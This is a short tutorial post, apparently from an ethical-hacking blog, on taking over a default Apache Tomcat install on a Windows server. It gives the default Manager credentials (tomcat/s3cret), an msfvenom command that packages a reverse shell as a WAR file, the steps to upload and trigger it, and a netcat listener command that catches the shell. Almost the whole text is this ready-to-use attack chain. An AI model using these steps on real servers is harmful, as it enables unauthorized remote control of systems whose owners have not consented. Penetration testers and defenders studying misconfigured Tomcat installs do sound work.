How to exploit Apache Tomcat default install

A default Apache Tomcat installation, allows you to upload a War file and spawn a reverse shell in the server.
This Demo will be for a windows server.

Getting into the “Manager App”, it will ask you for a User/Password which is tomcat/s3cret by default.
we should first generate the War file by running:

  • msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f war > rev.war

this should generate a rev.war file which we will upload to the manager page.

1530409521172

After a successful upload, a JSP page will be created and the reverse shell is ready to go.
all we need to do is to set up our TCP Netcat listener using:

  • nc -nlvp PORT

and then navigate to the new JSP page. a shell will be spawned back to you.

Happy hacking!

 

Comments are closed, but trackbacks and pingbacks are open.

SignupSubscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.

Subscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.